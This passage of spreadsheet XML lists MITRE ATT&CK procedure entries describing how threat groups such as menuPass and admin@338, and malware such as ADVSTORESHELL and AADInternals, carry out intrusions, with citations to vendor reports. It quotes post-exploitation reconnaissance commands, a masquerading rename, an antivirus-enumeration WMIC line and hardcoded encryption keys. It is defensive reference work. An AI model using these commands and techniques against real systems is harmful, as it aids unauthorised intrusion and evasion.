    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has created a Registry Run key named &lt;code&gt;Dropbox Update Setup&lt;/code&gt; to establish persistence for a malicious Python binary.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used multi-stage packers for exploit code.(Citation: Check Point APT31 February 2021)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used malicious links and web beacons in e-mails for malware download and to track hits to attacker-controlled URL's.(Citation: Microsoft Targeting Elections September 2020)(Citation: Google Election Threats October 2020)(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used AES encrypted communications in C2.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to capture the processor architecture of a compromised host in order to register it with C2.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to enumerate proxy settings in the target environment.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to capture the username on a compromised host in order to register it with C2.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to capture the time on a compromised host in order to register it with C2.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used GitHub to host malware linked in spearphishing e-mails.(Citation: Google Election Threats October 2020)(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to open a Windows Command Shell on a remote host.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[admin@338](https://attack.mitre.org/groups/G0018) has exploited client software vulnerabilities for execution, such as Microsoft Word CVE-2012-0158.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[admin@338](https://attack.mitre.org/groups/G0018) actors used the following commands after exploiting a machine with [LOWBALL](https://attack.mitre.org/software/S0042) malware to obtain information about files and directories: &lt;code&gt;dir c:\ &gt;&gt; %temp%\download&lt;/code&gt; &lt;code&gt;dir "c:\Documents and Settings" &gt;&gt; %temp%\download&lt;/code&gt; &lt;code&gt;dir "c:\Program Files\" &gt;&gt; %temp%\download&lt;/code&gt; &lt;code&gt;dir d:\ &gt;&gt; %temp%\download&lt;/code&gt;(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[admin@338](https://attack.mitre.org/groups/G0018) actors used the following commands following exploitation of a machine with [LOWBALL](https://attack.mitre.org/software/S0042) malware to enumerate user accounts: &lt;code&gt;net user &gt;&gt; %temp%\download&lt;/code&gt; &lt;code&gt;net user /domain &gt;&gt; %temp%\download&lt;/code&gt;(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[admin@338](https://attack.mitre.org/groups/G0018) actors used the following command following exploitation of a machine with [LOWBALL](https://attack.mitre.org/software/S0042) malware to list local groups: &lt;code&gt;net localgroup administrator &gt;&gt; %temp%\download&lt;/code&gt;(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[admin@338](https://attack.mitre.org/groups/G0018) has attempted to get victims to launch malicious Microsoft Word attachments delivered via spearphishing emails.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[admin@338](https://attack.mitre.org/groups/G0018) actors used the following command to rename one of their tools to a benign file name: &lt;code&gt;ren "%temp%\upload" audiodg.exe&lt;/code&gt;(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[admin@338](https://attack.mitre.org/groups/G0018) has sent emails with malicious Microsoft Office documents attached.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[admin@338](https://attack.mitre.org/groups/G0018) actors used the following commands after exploiting a machine with [LOWBALL](https://attack.mitre.org/software/S0042) malware to obtain information about the OS: &lt;code&gt;ver &gt;&gt; %temp%\download&lt;/code&gt; &lt;code&gt;systeminfo &gt;&gt; %temp%\download&lt;/code&gt;(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[admin@338](https://attack.mitre.org/groups/G0018) actors used the following command after exploiting a machine with [LOWBALL](https://attack.mitre.org/software/S0042) malware to acquire information about local networks: &lt;code&gt;ipconfig /all &gt;&gt; %temp%\download&lt;/code&gt;(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[admin@338](https://attack.mitre.org/groups/G0018) actors used the following command following exploitation of a machine with [LOWBALL](https://attack.mitre.org/software/S0042) malware to display network connections: &lt;code&gt;netstat -ano &gt;&gt; %temp%\download&lt;/code&gt;(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[admin@338](https://attack.mitre.org/groups/G0018) actors used the following command following exploitation of a machine with [LOWBALL](https://attack.mitre.org/software/S0042) malware to obtain information about services: &lt;code&gt;net start &gt;&gt; %temp%\download&lt;/code&gt;(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>Following exploitation with [LOWBALL](https://attack.mitre.org/software/S0042) malware, [admin@338](https://attack.mitre.org/groups/G0018) actors created a file containing a list of commands to be executed on the compromised computer.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has encrypted files and information before exfiltration.(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has compressed files before exfiltration using TAR and RAR.(Citation: PWC Cloud Hopper April 2017)(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used the Csvde tool to collect Active Directory files and data.(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used [Wevtutil](https://attack.mitre.org/software/S0645) to remove PowerShell execution logs.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has resized and added data to the certificate table to enable the signing of modified files with legitimate signatures.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used DLL search order hijacking.(Citation: PWC Cloud Hopper April 2017)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used DLL side-loading to launch versions of Mimikatz and PwDump6 as well as [UPPERCUT](https://attack.mitre.org/software/S0275).(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 Sept 2018)(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[menuPass](https://attack.mitre.org/groups/G0045) has collected various files from the compromised computers.(Citation: DOJ APT10 Dec 2018)(Citation: Symantec Cicada November 2020)
</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has collected data from remote systems by mounting network shares with &lt;code&gt;net use&lt;/code&gt; and using Robocopy to transfer data.(Citation: PWC Cloud Hopper April 2017)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used [certutil](https://attack.mitre.org/software/S0160) in a macro to decode base64-encoded content contained in a dropper document attached to an email. The group has also used &lt;code&gt;certutil -decode&lt;/code&gt; to decode files on the victim’s machine when dropping [UPPERCUT](https://attack.mitre.org/software/S0275).(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used the Microsoft administration tool csvde.exe to export Active Directory data.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has registered malicious domains for use in intrusion campaigns.(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has leveraged vulnerabilities in Pulse Secure VPNs to hijack sessions.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used tools to exploit the ZeroLogon vulnerability (CVE-2020-1472).(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used a global service provider's IP as a proxy for C2 traffic from a victim.(Citation: FireEye APT10 April 2017)(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used dynamic DNS service providers to host malicious domains.(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>A [menuPass](https://attack.mitre.org/groups/G0045) macro deletes files after it has decoded and decompressed them.(Citation: Accenture Hogfish April 2018)(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has searched compromised systems for folders of interest including those related to HR, audit and expense, and meeting memos.(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has installed updates and new malware on victims.(Citation: PWC Cloud Hopper April 2017)(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used &lt;code&gt;InstallUtil.exe&lt;/code&gt; to execute malicious software.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used key loggers to steal usernames and passwords.(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used a modified version of pentesting tools wmiexec.vbs and secretsdump.py to dump credentials.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Github AD-Pentest-Script)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) stages data prior to exfiltration in multi-part archives, often saved in the Recycle Bin.(Citation: PWC Cloud Hopper April 2017)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has attempted to get victims to open malicious files such as Windows Shortcuts (.lnk) and/or Microsoft Office documents, sent via email as part of spearphishing campaigns.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[menuPass](https://attack.mitre.org/groups/G0045) has used [esentutl](https://attack.mitre.org/software/S0404) to change file extensions to their true type that were masquerading as .txt files.(Citation: FireEye APT10 Sept 2018) </t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has been seen changing malicious files to appear legitimate.(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used Ntdsutil to dump credentials.(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used native APIs including &lt;code&gt;GetModuleFileName&lt;/code&gt;, &lt;code&gt;lstrcat&lt;/code&gt;, &lt;code&gt;CreateFile&lt;/code&gt;, and &lt;code&gt;ReadFile&lt;/code&gt;.(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used tcping.exe, similar to [Ping](https://attack.mitre.org/software/S0097), to probe port status on systems of interest.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has encoded strings in its malware with base64 as well as with a simple, single-byte XOR obfuscation using key 0x40.(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) uses [PowerSploit](https://attack.mitre.org/software/S0194) to inject shellcode into PowerShell.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used process hollowing in iexplore.exe to load the [RedLeaves](https://attack.mitre.org/software/S0153) implant.(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has staged data on remote MSP systems or other victim networks prior to exfiltration.(Citation: PWC Cloud Hopper April 2017)(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used RDP connections to move across the victim network.(Citation: PWC Cloud Hopper April 2017)(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) uses scripts to enumerate IP ranges on the victim network. [menuPass](https://attack.mitre.org/groups/G0045) has also issued the command &lt;code&gt;net view /domain&lt;/code&gt; to a [PlugX](https://attack.mitre.org/software/S0013) implant to gather information about remote systems on the network.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has renamed [certutil](https://attack.mitre.org/software/S0160) and moved it to a different location on the system to avoid detection based on use of the tool.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used Putty Secure Copy Client (PSCP) to transfer data.(Citation: PWC Cloud Hopper April 2017)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used a script (atexec.py) to execute a command on a target machine via Task Scheduler.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has sent malicious Office documents via email as part of spearphishing campaigns as well as executables disguised as documents.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)(Citation: FireEye APT10 Sept 2018)(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used several tools to scan for open NetBIOS nameservers and enumerate NetBIOS sessions.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used &lt;code&gt;net use&lt;/code&gt; to conduct connectivity checks to machines.(Citation: PWC Cloud Hopper April 2017)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used and modified open-source tools like [Impacket](https://attack.mitre.org/software/S0357), [Mimikatz](https://attack.mitre.org/software/S0002), and [pwdump](https://attack.mitre.org/software/S0006).(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used legitimate access granted to Managed Service Providers in order to access victims of interest.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)(Citation: Symantec Cicada November 2020)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used valid accounts including shared between Managed Service Providers and clients to move between the two environments.(Citation: PWC Cloud Hopper April 2017)(Citation: Symantec Cicada November 2020)(Citation: District Court of NY APT10 Indictment December 2018)(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) executes commands using a command-line interface and reverse shell. The group has used a modified version of pentesting script wmiexec.vbs to execute commands.(Citation: PWC Cloud Hopper April 2017)(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Github AD-Pentest-Script)(Citation: FireEye APT10 Sept 2018) [menuPass](https://attack.mitre.org/groups/G0045) has used malicious macros embedded inside Office documents to execute files.(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used a modified version of pentesting script wmiexec.vbs, which logs into a remote machine using WMI.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Github AD-Pentest-Script)(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) has a command to retrieve metadata for files on disk as well as a command to list the current working directory.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) command and control commands are encrypted within the HTTP C2 channel using the DES algorithm in CBC mode with a key derived from the MD5 hash of the string HYF54&amp;%9&amp;jkMCXuiS. [3PARA RAT](https://attack.mitre.org/software/S0066) will use an 8-byte XOR key derived from the string HYF54&amp;%9&amp;jkMCXuiS if the DES decoding fails(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) has a command to set certain attributes such as creation/modification timestamps on files.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) uses HTTP for command and control.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) has the capability to obtain file and directory listings.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) has the capability to obtain a listing of running processes (including loaded modules).(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) obfuscates C2 communication using a 1-byte XOR with the key 0xBE.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) sends an OS version identifier in its beacons.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) uses HTTP for command and control.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) has the capability to create a remote shell.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can enumerate Azure AD users.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can create new Azure AD users.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can enumerate Azure AD groups.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can enumerate information about a variety of cloud services, such as Office 365 and Sharepoint instances or OpenID Configurations.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can gather unsecured credentials for Azure AD services, such as Azure AD Connect, from a local machine.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can register a device to Azure AD.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can gather information about a tenant’s domains using public Microsoft APIs.(Citation: AADInternals Documentation)(Citation: Azure AD Recon)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can create a backdoor by converting a domain to a federated domain which will be able to authenticate any user across the tenant. [AADInternals](https://attack.mitre.org/software/S0677) can also modify DesktopSSO information.(Citation: AADInternals Documentation)(Citation: Azure AD Federation Vulnerability)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can check for the existence of user email addresses using public Microsoft APIs.(Citation: AADInternals Documentation)(Citation: Azure AD Recon)</t>
  </si>
  <si>
    <t>AADInternals can inject a malicious DLL (`PTASpy`) into the `AzureADConnectAuthenticationAgentService` to backdoor Azure AD Pass-Through Authentication.(Citation: AADInternals Azure AD On-Prem to Cloud)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can dump secrets from the Local Security Authority.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can modify registry keys as part of setting a new pass-through authentication agent.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>The AADInternals `Set-AADIntUserMFA` command can be used to disable MFA for a specified user.</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) is written and executed via PowerShell.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can gather encryption keys from Azure AD services such as ADSync and Active Directory Federated Services servers.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can be used to create SAML tokens using the AD Federated Services token signing certificate.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can be used to forge Kerberos tickets using the password hash of the AZUREADSSOACC account.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can send "consent phishing" emails containing malicious links designed to steal users’ access tokens.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can send phishing emails containing malicious links designed to collect users’ credentials.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can steal users’ access tokens via phishing emails containing malicious links.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can create and export various authentication certificates, including those associated with Azure AD joined/registered devices.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to decrypt AES encrypted payloads.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to download files from C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to identify the installed anti-virus product on the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) can extract a malicious Portable Executable (PE) from a photo.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to use HTTP in communications with C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to use [cmd](https://attack.mitre.org/software/S0106) to run a Portable Executable (PE) on the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) compresses output data generated by command execution with a custom implementation of the Lempel–Ziv–Welch (LZW) algorithm.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>A variant of [ADVSTORESHELL](https://attack.mitre.org/software/S0045) encrypts some C2 with RSA.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>Some variants of [ADVSTORESHELL](https://attack.mitre.org/software/S0045) achieve persistence by registering the payload as a Shell Icon Overlay handler COM object.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) exfiltrates data over the same channel used for C2.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can delete files and directories.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can list files and directories.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can perform keylogging.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) stores output from command execution in a .dat file in the %TEMP% directory.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is capable of setting and deleting Registry values.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is capable of starting a process using CreateProcess.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>Most of the strings in [ADVSTORESHELL](https://attack.mitre.org/software/S0045) are encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed. API function names are also reversed, presumably to avoid detection in memory.(Citation: Kaspersky Sofacy)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can list connected devices.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can list running processes.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can enumerate registry keys.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) achieves persistence by adding itself to the &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key.(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) has used rundll32.exe in a Registry value to establish persistence.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>C2 traffic from [ADVSTORESHELL](https://attack.mitre.org/software/S0045) is encrypted, then encoded with Base64 encoding.(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>A variant of [ADVSTORESHELL](https://attack.mitre.org/software/S0045) encrypts some C2 with 3DES.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can run [Systeminfo](https://attack.mitre.org/software/S0096) to gather information about the victim.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can create a remote shell and run a given command.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ASPXSpy](https://attack.mitre.org/software/S0073) is a Web shell. The ASPXTool version used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) has been deployed to accessible servers running Internet Information Services (IIS).(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) can collect local data from an infected machine.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) can use Base64 to decode actor-controlled C2 server communications.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) has the ability to collect drive and file information on an infected machine.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) has the ability to download additional payloads onto an infected machine.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t xml:space="preserve"> [Action RAT](https://attack.mitre.org/software/S1028)'s commands, strings, and domains can be Base64 encoded within the payload.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) can identify AV products on an infected host using the following command: `cmd.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List`.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) has the ability to collect the hostname, OS version, and OS architecture of an infected host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) has the ability to collect the MAC address of an infected host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t xml:space="preserve"> [Action RAT](https://attack.mitre.org/software/S1028) has the ability to collect the username from an infected host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) can use HTTP to communicate with C2 servers.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) can use `cmd.exe` to execute commands on an infected host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
